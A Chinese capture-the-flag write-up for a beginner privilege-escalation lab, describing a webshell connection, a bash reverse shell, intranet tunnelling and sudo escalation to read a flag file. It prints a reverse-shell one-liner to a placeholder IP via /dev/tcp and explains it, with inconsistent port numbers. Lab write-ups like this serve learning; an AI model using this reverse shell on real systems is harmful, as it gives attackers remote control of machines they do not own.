好靶场--最简单的提权
本文介绍了通过反弹Shell和内网穿透技术获取服务器权限的方法。首先使用蚁剑连接目标服务器,发现当前用户权限不足,尝试通过反弹Shell提权。详细解释了反弹Shell命令的原理:通过TCP连接将目标机的bash输入/输出重定向到控制端。针对非本地靶场的内网环境,需要使用内网穿透和端口转发技术将内网地址映射到公网。最后通过sudo提权获取root权限,即可使用cat命令读取flag文件。文章还提供了
题目地址:http://loveli.com.cn/see_bug_one?id=293&contest=ALL
前置知识:反弹shell,内网穿透,端口映射
直接蚁剑连,不多说了
然后我们尝试的去打开flag.txt,发现没办法打开权限不足,我们打开蚁剑终端
打开终端我们查看权限,发现我们当前的用户是www-data,我们要提权肯定要拿root权限,我们尝试sudo su提权,发现提权失败,想到反弹shell提权
bash -c 'exec bash -i &>/dev/tcp/IP/2333 <&1'解释:
- 启动新 bash 进程,执行单引号内的指令;
- 用
exec替换当前进程,启动交互式 bash; - 把 bash 的标准输出、标准错误重定向到
IP:9999的 TCP 连接; - 把 bash 的标准输入也重定向到这个 TCP 连接;
- 最终效果:控制端监听 9999 端口后,目标机器的 bash 所有输入 / 输出都通过这个 TCP 连接和控制端交互,实现反向 Shell。
反弹之后直接nc监听就行了,但是这靶场不是本地的,内网怎么可能直接访问公网呢?所以后面就是要做内网穿透和端口转发,之前我只学过frp内网穿透,但是那个太麻烦了。下面两篇是csdn上大佬的内网穿透和端口转发教程:内网穿透
https://blog.csdn.net/weixin_41549915/article/details/103697751
端口转发https://blog.csdn.net/qq_44657899/article/details/106307545
需要注意的是,我们反弹shell的ip应该是公网ip和端口,我们的目的是将内网的地址和端口映射到外网,所有在执行命令的时候不要使用内网ip而是外网ip(两篇文章里面有更详细的说明)
这一步就是sudo提权,没什么好说的了 后面直接使用cat命令就能拿到flag了
腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。
更多推荐
10
0- 0
已为社区贡献1条内容
所有评论(0)